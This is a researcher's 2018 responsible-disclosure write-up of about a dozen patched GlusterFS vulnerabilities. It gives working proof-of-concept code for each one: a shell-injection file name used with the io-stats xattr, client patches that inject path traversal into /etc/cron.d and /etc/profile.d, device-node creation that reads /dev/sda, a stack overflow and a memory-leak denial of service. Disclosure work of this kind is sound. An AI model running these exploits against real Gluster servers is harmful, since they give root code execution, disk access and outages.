Author: Michael Hanselmann. Updated: September 11, 2018.
During July and early August 2018 I reported a series of vulnerabilities in Gluster file system to Red Hat using responsible disclosure. Patch releases were made available on September 4, 2018:
- Red Hat Gluster Storage 3.4 on Red Hat Enterprise Linux 7 (RHSA-2018:2607)
- Red Hat Gluster Storage 3.4 on Red Hat Enterprise Linux 6 (RHSA-2018:2608)
The upstream project made patch releases on September 6, 2018:
Contents
- Unsanitized file names in debug/io-stats translator can allow remote attackers to execute arbitrary code (CVE-2018-10904)
- Reproduction
- Stack-based buffer overflow in server-rpc-fops.c allows remote attackers to execute arbitrary code (CVE-2018-10907)
- Reproduction
- I/O to arbitrary devices on storage server (CVE-2018-10923)
- Reproduction
- Improper deserialization in dict.c:dict_unserialize() can allow attackers to read arbitrary memory (CVE-2018-10911)
- Reproduction
- Remote denial of service of gluster volumes via posix_get_file_contents function in posix-helpers.c (CVE-2018-10914)
- Information exposure in posix_get_file_contents function in posix-helpers.c (CVE-2018-10913)
- Reproduction
- Denial-of-service via fsync(2) in Gluster FUSE client (CVE-2018-10924)
- Reproduction
- RPC path traversal
- Reproduction preparation
- File status information leak and denial of service (CVE-2018-10927)
- Reproduction
- Improper resolution of symlinks allows for privilege escalation (CVE-2018-10928)
- Reproduction
- Arbitrary file creation on storage server allows for execution of arbitrary code (CVE-2018-10929)
- Reproduction
- Files can be renamed outside volume (CVE-2018-10930)
- Reproduction
- Device files can be created in arbitrary locations (CVE-2018-10926)
- Reproduction
Unsanitized file names in debug/io-stats translator can allow remote attackers to execute arbitrary code (CVE-2018-10904)
The Gluster file system automatically inserts the debug/io-stats
translator into the translator graphs for all volumes. By setting an extended attribute (xattr) for any element on a volume to a string that string is treated as a path on both client and server to which I/O statistics are written. The path may be anything, including in /etc
, for example. This behaviour can be used to gain remote code execution. An attacker requires sufficient access to modify the extended attributes of files on a Gluster volume.
Reproduction
Reproduced using Gluster 3.12.8 running on RHEL 7.5, discovered in Gluster 3.12.12 code.
Assume we have a Gluster named “gluster-pv15” on a storage server we don't control. The volume is mounted on the client at /data
. At first a file must be opened whose name contains the shell code to be executed:
while sleep 1; do date; done \ >$'/data/a\necho; echo "Hello World, I am $(id)"; echo\n'
The first proof-of-concept code for this vulnerability used the xattr trusted.io-stats-dump
. The Linux kernel only allows users with the CAP_SYS_ADMIN capability to manipulate xattrs in the trusted
namespace. Assuming the attacker has no direct access to the storage servers, but has full control over the client with the volume mounted via Gluster's FUSE client, that is no hindrance.
What I only realized after re-reading the code is that the Gluster code doesn't actually check for the trusted
namespace and uses fnmatch(3)
instead. Thus it's also possible to exploit this vulnerability as an unprivileged user.
Set the user.io-stats-dump
xattr in a second shell:
setfattr -n user.io-stats-dump -v /etc/bash_completion.d/poc /data
What will have happened is that /etc/bash_completion.d/poc.gluster-pv15
was written on the client and /etc/bash_completion.d/poc.gluster-pv15-io-stats
on the server. The next time anyone starts an interactive Bash shell on a Gluster server the file contents are sourced and executed. On my test environment the following message is shown multiple times upon opening a shell:
Hello World, I am uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
The trivial example produces many errors upon sourcing, though a real-world exploit could use ANSI/VT100 codes to clear the responsible lines and move the cursor back to its original location before moving itself to a more appropriate and persistent location where no visible errors will be produced.
What prevents the code from directly writing a cron file in /etc/cron.d
is that the dump file uses an insecure mode of 0666 on the server, presumably due to umask, which cron complains about (“BAD FILE MODE (/etc/cron.d/poc.gluster-pv15-io-stats)”; clients use 0644). This could well be considered a further security issue.
Stack-based buffer overflow in server-rpc-fops.c allows remote attackers to execute arbitrary code (CVE-2018-10907)
The GlusterFS server is vulnerable to multiple stack based buffer overflows due to functions in server-rpc-fopc.c allocating fixed-size buffers using alloca(3)
. An authenticated attacker could exploit this by mounting a Gluster volume and sending a string longer that the fixed buffer size to cause crash or potential code execution.
Reproduction
Reproduced using Gluster 3.12.12.
from gluster import gfapi vol = gfapi.Volume('localhost', 'vol1', port=24007, log_file='/dev/stderr') vol.mount() print(vol.getxattr("test", 2000 * "A"))
Excerpt from stack trace in glusterfsd
:
#0 __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:62 #1 0x00007fffea494245 in gf_strdup (src=0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>) at ../../../../libglusterfs/src/mem-pool.h:185
I/O to arbitrary devices on storage server (CVE-2018-10923)
The Gluster file system implements a series of file system operations in the form of remote procedure calls (RPC). They are transported over the wire using TCP, optionally protected by SSL/TLS.
The mknod
call, derived from mknod(2)
, can be used by an authenticated attacker to create files pointing to devices (“device special file”). Such device files can be opened on the server using normal I/O operations. As a consequence it's possible to read arbitrary devices. Writing is likely also possible, but wasn't tested.
Reproduction
Reproduced with Gluster 3.12.12 on release-3.12 branch (commit f98d86f2a) with minor local changes in client code (see patch).
The provided reproduction code written in Python reads the first 512 bytes of /dev/sda
. Those bytes usually contain the master boot record (MBR) ending in the boot signature 0x55AA.
Patching the Gluster client code is necessary to disable a file type check in the API client as well as the “open-behind” translator as the latter seems to break opening devices. Passing O_TRUNC via the flags to the open
function would have the same effect in most cases (see open-behind.c:ob_open_behind
), but was considered too dangerous for general-purpose reproduction code. Another option would be to ignore the open-behind
translator when building the I/O graph.
Assume we have a Gluster named “vol2” on a storage server we don't control, but whose API we can access (i.e. FUSE client isn't involved). Create for test purposes:
lvcreate --name vol2 --size 100M vg mkfs.ext4 /dev/vg/vol2 mkdir /data/vol2 mount /dev/vg/vol2 /data/vol2 gluster volume create vol2 storage1:/data/vol2/brick force gluster volume start vol2
Build and install Gluster client library with patch applied (exact instructions depend on environment):
patch -p1 <<'EOF' diff --git a/api/src/glfs-fops.c b/api/src/glfs-fops.c index 7fb86fc85..5492bb683 100644 --- a/api/src/glfs-fops.c +++ b/api/src/glfs-fops.c @@ -194,12 +194,6 @@ retry: goto out; } - if (!IA_ISREG (iatt.ia_type)) { - ret = -1; - errno = EINVAL; - goto out; - } - if (glfd->fd) { /* Retry. Safe to touch glfd->fd as we still have not glfs_fd_bind() yet. diff --git a/xlators/performance/open-behind/src/open-behind.c b/xlators/performance/open-behind/src/open-behind.c index d6dcf6fbc..d266dc3e8 100644 --- a/xlators/performance/open-behind/src/open-behind.c +++ b/xlators/performance/open-behind/src/open-behind.c @@ -259,7 +259,7 @@ ob_open_behind (call_frame_t *frame, xlator_t *this, loc_t *loc, int flags, conf = this->private; - if (flags & O_TRUNC) { + if (1) { STACK_WIND (frame, default_open_cbk, FIRST_CHILD (this), FIRST_CHILD (this)->fops->open, loc, flags, fd, xdata); EOF make && sudo make install
Install libgfapi Python module with mknod(2) support on client as an unprivileged user.
git clone https://github.com/gluster/libgfapi-python.git cd libgfapi-python python setup.py build python setup.py install --user
Run Python 2.x code on client as an unprivileged user and with libgfapi module installed. Assuming the storage server has an “sda” disk the printed data should end with 0x55AA.
$ python <<'EOF' import os, stat from gluster import gfapi vol = gfapi.Volume("storage1", "vol2", port=24007, log_file="/dev/stderr") vol.mount() vol.setfsuid(0) vol.setfsgid(0) if vol.exists("device"): vol.unlink("device") # sda is major=8, minor=0 vol.mknod("device", stat.S_IFBLK | 0600, os.makedev(8, 0)) with gfapi.File(vol.open("device", os.O_RDONLY)) as fh: print fh.read(512).encode("hex") EOF
Example output (logging disabled):
$ python gfvol.py eb63[…]000000000000000000000000000055aa
Improper deserialization in dict.c:dict_unserialize() can allow attackers to read arbitrary memory (CVE-2018-10911)
The dict.c:dict_unserialize
function in GlusterFS does not handle negative key length values properly. An attacker could use this flaw to read memory from other locations into the stored dict value.
Reproduction
dict_t *dict = dict_new(); if (!dict) { return 0; } char test[] = "qwertzuip"; char friends_val[] = { // Count 0x00, 0x00, 0x00, 0x01, // Negative key len 0xff, 0xff, 0xff, 0xff - 22, // Value len 0x00, 0x00, 0x00, 10, // Key 'K', 'E', 'Y', '\0', // Value '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '\0', // End 0x00, }; ret = dict_unserialize(friends_val, sizeof(friends_val), &dict); printf("ret = %d\n", ret); printf("%s\n", test); dict_dump_to_log(dict);
In my tests the output was as follows:
ret = 0 qwertzuip […] [dict.c:3052:dict_dump_to_log] […] ((KEY:qwertzuip))
Note how the value is not 0123456789
as one would expect. Instead an unrelated string from another variable is used.
If one finds an RPC function reflecting an incoming dictionary it might be possible to read a function pointer and extract the libc base address. If the serialized dictionary is stored in a stack-allocated buffer (alloca(3)
) it might be possible to get the stack canary. And even on the heap it might be possible to get values better not shared with remote parties.
Remote denial of service of gluster volumes via posix_get_file_contents function in posix-helpers.c (CVE-2018-10914)
Unprivileged users can issue an xattr request via Gluster FUSE to cause brick processes to terminate with a segmentation fault. If Gluster multiplexing is enabled this will result in a crash of multiple bricks and Gluster volumes.
See CVE-2018-10913 for reproduction.
Information exposure in posix_get_file_contents function in posix-helpers.c (CVE-2018-10913)
Unprivileged users can use xattr requests via Gluster FUSE to determine the existence of any file on a server.
Reproduction
Tested with Gluster 3.12.12 from release-3.12 Git branch as of about July 14, 2018.
It appears that in 2012 there was an attempt to implement a “read file” extended attribute in Gluster (glusterfs.file.<filename>
, checked for in posix.c:posix_getxattr
and calling into posix-helpers.c:posix_get_file_contents
) and the code was never finished, or has been made into a virtual no-op since. The resulting file content is neither used nor returned. However, after reading the file content there is a bug due operator precedence ([]
comes before pointer dereference) whereby the file size acts as an offset in pointer-sized increments from a heap-allocated buffer at which a zero byte is written. If the file existed and no page is allocated at the offset address the brick process receives SIGSEGV and terminates:
Thread 10 "glusteriotwr0" received signal SIGSEGV, Segmentation fault. 0x00007f8a9d1ffdc3 in posix_get_file_contents (this=0x7f8a9800ae50, pargfid=0x7f8a6c002760 "", name=0x7f8a6c00623f "../../../../../../../../../../../../etc/shadow", contents=0x7f8aa335c3c0) at posix-helpers.c:1055 1055 *contents[stbuf.ia_size] = '\0';
Otherwise a file anywhere within the Gluster volume or outside (see below) can be controlled by an attacker to set the offset for the write. Fixing that bug is not enough:
--- a/xlators/storage/posix/src/posix-helpers.c +++ b/xlators/storage/posix/src/posix-helpers.c @@ -1052,7 +1052,7 @@ posix_get_file_contents (xlator_t *this, uuid_t pargfid, goto out; } - *contents[stbuf.ia_size] = '\0'; + (*contents)[stbuf.ia_size] = '\0'; op_ret = sys_close (file_fd); file_fd = -1;
Now the function allows an arbitrary user to reliably determine whether a file exists via the error code (EOPNOTSUPP means file exists, ENOENT means file does not exist). The path can be anything, including outside the Gluster file system (note that this is with the fix applied and with the brick running on the same system):
$ rm -f /tmp/file; sudo -u nobody getfattr -n glusterfs.file.../../../../../../../../../../../../../tmp/file /mnt/ /mnt/: glusterfs.file.../../../../../../../../../../../../../tmp/file: No such file or directory $ touch /tmp/file2; sudo -u nobody getfattr -n glusterfs.file.../../../../../../../../../../../../../tmp/file2 /mnt/ /mnt/: glusterfs.file.../../../../../../../../../../../../../tmp/file2: Operation not permitted
There is also a “write file” counterpart xattr (posix-helpers.c:posix_set_file_contents
called from posix-helpers.c:posix_handle_pair
). Luckily this one is disabled with a hardcoded return -1
.
Denial-of-service via fsync(2) in Gluster FUSE client (CVE-2018-10924)
The Gluster FUSE client exposes a POSIX-like file system by using Gluster volume servers as a storage backend. One operation available on file descriptors is fsync(2)
which “[…] transfers ("flushes") all modified in-core data of […] the file referred to by the file descriptor fd to the disk device […]”.
In at least Gluster 3.12.11 and 3.12.12 fsync(2)
leaks memory. An authenticated attacker could use this flaw to launch a denial of service attack by making Gluster clients consume memory on the host machine. State dumps show large and continously growing allocation numbers for gf_common_mt_memdup
and gf_common_mt_char
.
After about 20 minutes of running two instances of the reproduction code the FUSE client consumes around 1.9 GB of RAM. Eventually the kernel's out-of-memory (OOM) killer will take out other, unrelated processes.
Reproduction
Reproduced with Gluster 3.12.12 installed from CentOS build server into a CentOS 7 Docker container. Also reproduced with Gluster 3.12.11 from CentOS Storage SIG repository installed on RHEL 7.5 servers.
Start a privileged container to contain the installed packages:
docker run --privileged --rm -it --name centos docker.io/library/centos:7
Configure repository:
cat > /etc/yum.repos.d/gluster.repo <<'EOF' [gluster] name=gluster baseurl=https://buildlogs.centos.org/centos/7/storage/x86_64/gluster-3.12/ enabled=True gpgcheck=True gpgkey=https://raw.githubusercontent.com/CentOS-Storage-SIG/centos-release-storage-common/master/RPM-GPG-KEY-CentOS-SIG-Storage priority=1 exclude= EOF
Install Gluster FUSE client (at the time of writing the 3.12.12 packages aren't signed on the build server and aren't available via mirrors):
make makecache && \ yum install -y --nogpgcheck glusterfs-fuse
Verify installed version:
$ glusterfs --version glusterfs 3.12.12
Mount a test volume:
mount -t glusterfs storage1:/gluster-pv12 /mnt
Run reproduction code, optionally in multiple instances (start more shells with docker exec -it centos /bin/bash
):
python <<'EOF' import os, time with open("/mnt/tmp{}".format(os.getpid()), "w") as fh: while True: os.lseek(fh.fileno(), 0, os.SEEK_SET) os.write(fh.fileno(), str(time.time()).encode("ascii")) os.fsync(fh) EOF
Let reproduction run for a short while, then start observing top
or similar. One will notice the ever-increasing memory consumption of the "glusterfs" process backing the volume mount.
RPC path traversal
Reproduction preparation
These vulnerabilities were reproduced with Gluster 3.12.12 on release-3.12 branch (commit f98d86f2a) with minor local changes (see patch).
A small set of the RPC request data structures allow clients to specify a path or filename. The Gluster server does not validate these sufficiently. Depending on the request type they allow a malicious client to escalate privileges and execute code on the server by performing a path traversal attack, to cause the brick process to terminate (denial of service, esp. on clusters where brick multiplexing is enabled), or to extract information on files and directories.
The reproduction uses a patched version of the Gluster client API code and Python code to trigger the vulnerabilities. Doing so is simpler than producing a standalone client.
Assume we have a Gluster named “vol2” on a storage server we don't control, but whose API we can access (i.e. FUSE client isn't involved). Create for test purposes:
lvcreate --name vol2 --size 100M vg mkfs.ext4 /dev/vg/vol2 mkdir /data/vol2 mount /dev/vg/vol2 /data/vol2 gluster volume create vol2 storage1:/data/vol2/brick force gluster volume start vol2
Reproduction cases may cause the Gluster brick process to terminate. Restart if necessary:
gluster --mode=script volume stop vol2 force && \ gluster --mode=script volume start vol2 force
Build and install Gluster client library with patch applied (exact instructions depend on environment):
patch -p1 <<'EOF' diff --git a/api/src/glfs-fops.c b/api/src/glfs-fops.c index 7fb86fc85..5492bb683 100644 --- a/api/src/glfs-fops.c +++ b/api/src/glfs-fops.c @@ -194,12 +194,6 @@ retry: goto out; } - if (!IA_ISREG (iatt.ia_type)) { - ret = -1; - errno = EINVAL; - goto out; - } - if (glfd->fd) { /* Retry. Safe to touch glfd->fd as we still have not glfs_fd_bind() yet. diff --git a/xlators/protocol/client/src/client-common.c b/xlators/protocol/client/src/client-common.c index 873b0f0f4..5755bb421 100644 --- a/xlators/protocol/client/src/client-common.c +++ b/xlators/protocol/client/src/client-common.c @@ -89,6 +89,16 @@ client_pre_mknod (xlator_t *this, gfs3_mknod_req *req, loc_t *loc, req->dev = rdev; req->umask = umask; + if (req->bname && strncmp(req->bname, "poc-mknod-", 10) == 0) { + size_t len = 100 + strlen(req->bname); + char * newbname = calloc(len, 1); + if (!newbname) { + op_errno = ENOMEM; + goto out; + } + snprintf(newbname, len, "../../../../../../../../tmp/%s", req->bname); + req->bname = newbname; + } GF_PROTOCOL_DICT_SERIALIZE (this, xdata, (&req->xdata.xdata_val), req->xdata.xdata_len, op_errno, out); @@ -205,6 +215,10 @@ client_pre_symlink (xlator_t *this, gfs3_symlink_req *req, loc_t *loc, req->bname = (char *)loc->name; req->umask = umask; + if (req->bname && strcmp(req->bname, "poc-symlink") == 0) { + req->bname = strdup("../../../../../../etc/profile.d/poc-symlink.sh"); + } + GF_PROTOCOL_DICT_SERIALIZE (this, xdata, (&req->xdata.xdata_val), req->xdata.xdata_len, op_errno, out); return 0; @@ -241,6 +255,10 @@ client_pre_rename (xlator_t *this, gfs3_rename_req *req, loc_t *oldloc, req->oldbname = (char *)oldloc->name; req->newbname = (char *)newloc->name; + if (oldloc->name && strcmp(oldloc->name, "poc-rename-source") == 0) { + req->newbname = (char*)"../../../../../../../../poc-rename-dest"; + } + GF_PROTOCOL_DICT_SERIALIZE (this, xdata, (&req->xdata.xdata_val), req->xdata.xdata_len, op_errno, out); @@ -664,6 +682,10 @@ client_pre_create (xlator_t *this, gfs3_create_req *req, req->flags = gf_flags_from_flags (flags); req->umask = umask; + if (loc->name && strcmp(loc->name, "poc-creat-cron.d") == 0) { + req->bname = (char*)"../../../../../../../../etc/cron.d/poc-creat"; + } + GF_PROTOCOL_DICT_SERIALIZE (this, xdata, (&req->xdata.xdata_val), req->xdata.xdata_len, op_errno, out); @@ -787,6 +809,21 @@ client_pre_lookup (xlator_t *this, gfs3_lookup_req *req, loc_t *loc, else req->bname = ""; + if (loc->name && strncmp(loc->name, "poc-lookup-", 11) == 0) { + memset(req->gfid, '\0', 16); + memset(req->pargfid, '\0', 16); + req->pargfid[15] = 1; + + if (strcmp(loc->name, "poc-lookup-bin-ls") == 0) { + req->bname = (char *)"../../../../../../../../bin/ls"; + } else if (strcmp(loc->name, "poc-lookup-assert") == 0) { + req->bname = (char *)"../../../../../../../../tmp/"; + } else { + op_errno = EINVAL; + goto out; + } + } + if (xdata) { GF_PROTOCOL_DICT_SERIALIZE (this, xdata, (&req->xdata.xdata_val), EOF make && sudo make install
Install libgfapi Python module with mknod(2) support on client as an unprivileged user.
git clone https://github.com/gluster/libgfapi-python.git cd libgfapi-python python setup.py build python setup.py install --user
File status information leak and denial of service (CVE-2018-10927)
The gfs3_lookup_req
RPC request suffers from a path traversal vulnerability, causing it to leak information to an authenticated attacker. Given the right circumstances it can also be used to crash a Gluster brick process.
Reproduction
(See separate preparation steps)
Extract file status from arbitrary file or directory. Compare with stat /bin/ls
on storage server. Returns ENOENT
for non-existent files.
$ python <<'EOF' from gluster import gfapi vol = gfapi.Volume("storage1", "vol2", port=24007, log_file="/dev/stderr") vol.mount() st = vol.stat("poc-lookup-bin-ls") print("\n### mode={:o} size={}\n".format(st.st_mode, st.st_size)) EOF
Ending path with slash (“/”) triggers “Malformed link” assertion in posix-handle.c:posix_handle_soft
, causing brick process to terminate.
$ python <<'EOF' from gluster import gfapi vol = gfapi.Volume("storage1", "vol2", port=24007, log_file="/dev/stderr") vol.mount() vol.stat("poc-lookup-assert") EOF
Excerpt from stack trace:
#3 0x00007f7d31ff6fc2 in __GI___assert_fail (assertion=0x7f7d2ce878ca "!\"Malformed link\"", file=0x7f7d2ce8755b "posix-handle.c", line=820, function=0x7f7d2ce87b10 <__PRETTY_FUNCTION__.16367> "posix_handle_soft") at assert.c:101 #4 0x00007f7d2ce7ea4d in posix_handle_soft (this=0x7f7d2800ae50, real_path=0x7f7d32fd8600 "/data/vol1/brick/../../../../../../tmp/", loc=0x7f7cfc002740, gfid=0x7f7d32fd84a0 "\212+\027\a\270\303G1\250\233n\332^\005\306\311\351g\350,}\177", oldbuf=0x7f7d32fd8410) at posix-handle.c:820 #5 0x00007f7d2ce7793f in posix_gfid_set (this=0x7f7d2800ae50, path=0x7f7d32fd8600 "/data/vol1/brick/../../../../../../tmp/", loc=0x7f7cfc002740, xattr_req=0x7f7cfc0024d0) at posix-helpers.c:910 #6 0x00007f7d2ce79295 in posix_gfid_heal (this=0x7f7d2800ae50, path=0x7f7d32fd8600 "/data/vol1/brick/../../../../../../tmp/", loc=0x7f7cfc002740, xattr_req=0x7f7cfc0024d0) at posix-helpers.c:1568 #7 0x00007f7d2ce477d9 in posix_lookup (frame=0x7f7d18000ee0, this=0x7f7d2800ae50, loc=0x7f7cfc002740, xdata=0x7f7cfc0024d0) at posix.c:266
Improper resolution of symlinks allows for privilege escalation (CVE-2018-10928)
The RPC request gfs3_symlink_req
in GlusterFS allows symlink destinations to point to file paths outside of the Gluster volume. An authenticated attacker could use this flaw to create arbitrary symlinks pointing anywhere on the server and execute arbitrary code on GlusterFS server.
Reproduction
(See separate preparation steps)
Symlinks can be created anywhere via a crafted request. The link destination can, correctly, point anywhere--it doesn't need to resolve on the volume. After running the example code a new script will have been linked in /etc/profile.d/
and allows an attacked to execute code when a login shell is opened.
$ python <<'EOF' import os, re, time from gluster import gfapi vol = gfapi.Volume("storage1", "vol2", port=24007, log_file="/dev/stderr") vol.mount() vol.setfsuid(0) vol.setfsgid(0) scriptname = "script" with gfapi.File(vol.open(scriptname, os.O_CREAT | os.O_TRUNC | os.O_WRONLY, 0o755)) as fh: fh.fchmod(0o755) fh.write("#!/bin/sh\necho 'Gluster rename PoC {}'\nid\n".format(time.ctime())) # Get absolute path to script in volume pinfo = vol.getxattr(scriptname, "glusterfs.pathinfo") m = re.search(r"(?i)<POSIX\([^)]*\):[^:]*:(?P<path>[^>]+)>", pinfo) assert m scriptpath = m.group("path") assert os.path.isabs(scriptpath) print "Script path:", scriptpath vol.symlink(scriptpath, "poc-symlink") EOF
Arbitrary file creation on storage server allows for execution of arbitrary code (CVE-2018-10929)
The gfs3_create_req
RPC request contains a flaw whereby arbitrary files can be created outside a Gluster volume, leading to code execution.
Reproduction
(See separate preparation steps)
Create any file on storage server, allowing arbitrary code execution. Run the reproduction code and then watch system log on storage server for a minute or two. Proof of concept code assumes that /etc
is on a different filesystem from volume; otherwise cron complains about created file having multiple links.
$ python <<'EOF' import os from gluster import gfapi vol = gfapi.Volume("storage1", "vol2", port=24007, log_file="/dev/stderr") vol.mount() # Arbitrary file owner and group vol.setfsuid(0) vol.setfsgid(0) with gfapi.File(vol.open("poc-creat-cron.d", os.O_CREAT | os.O_TRUNC | os.O_WRONLY, 0o644)) as fh: fh.write("* * * * * root echo \"Hello World, `id`\" | logger\n") EOF
Files can be renamed outside volume (CVE-2018-10930)
A flaw in the gfs3_rename_req
RPC request in GlusterFS server allows an authenticated attacker to write files outside the Gluster volume.
Reproduction
(See separate preparation steps)
The source name is resolved within volume and must exist, but the destination may be outside. Works only when destination is on same filesystem as source, fails with EXDEV
otherwise. The proof of concept exploit assumes that the volume uses the root filesystem (/
). Upon completion /poc-rename-dest
will exist and contain an up-to-date timestamp.
$ python <<'EOF' import os, time from gluster import gfapi vol = gfapi.Volume("storage1", "vol2", port=24007, log_file="/dev/stderr") vol.mount() vol.setfsuid(0) vol.setfsgid(0) src = "poc-rename-source" # Write source with gfapi.File(vol.open(src, os.O_CREAT | os.O_TRUNC | os.O_WRONLY, 0o644)) as fh: fh.write("rename poc {}\n".format(time.ctime())) vol.rename(src, "unused") EOF
Device files can be created in arbitrary locations (CVE-2018-10926)
The RPC request gfs3_mknod_req
supported by the GlusterFS server could be used by an authenticated attacker to create device files at arbitrary locations via path traversal.
Reproduction
(See separate preparation steps)
Device files can be created at any location without trouble. In this example an unprivileged user creates them in /tmp
and, if they have shell access to the storage server or other means of reading files, they can read/write the full disk contents, for example.
$ python <<'EOF' import os, stat from gluster import gfapi vol = gfapi.Volume("storage1", "vol2", port=24007, log_file="/dev/stderr") vol.mount() vol.setfsuid(0) vol.setfsgid(0) vol.mknod("poc-mknod-urandom", stat.S_IFCHR | 0666, os.makedev(1, 9)) vol.mknod("poc-mknod-sda", stat.S_IFBLK | 0666, os.makedev(8, 0)) EOF
On storage server:
$ sudo -u nobody xxd -l 32 /tmp/poc-mknod-urandom 00000000: 79b5 4f9b d874 e19d afe2 efa1 23fb 122c y.O..t......#.., 00000010: 64db c1bc a2c9 fee0 fcf6 9c7f da45 e5e6 d............E.. $ sudo -u nobody fdisk -l /tmp/poc-mknod-sda Disk /tmp/poc-mknod-sda: 24.4 GiB, 26214400000 bytes, 51200000 sectors […] Device Boot Start End Sectors Size Id Type /tmp/poc-mknod-sda1 * 2048 51199966 51197919 24.4G 8e Linux LVM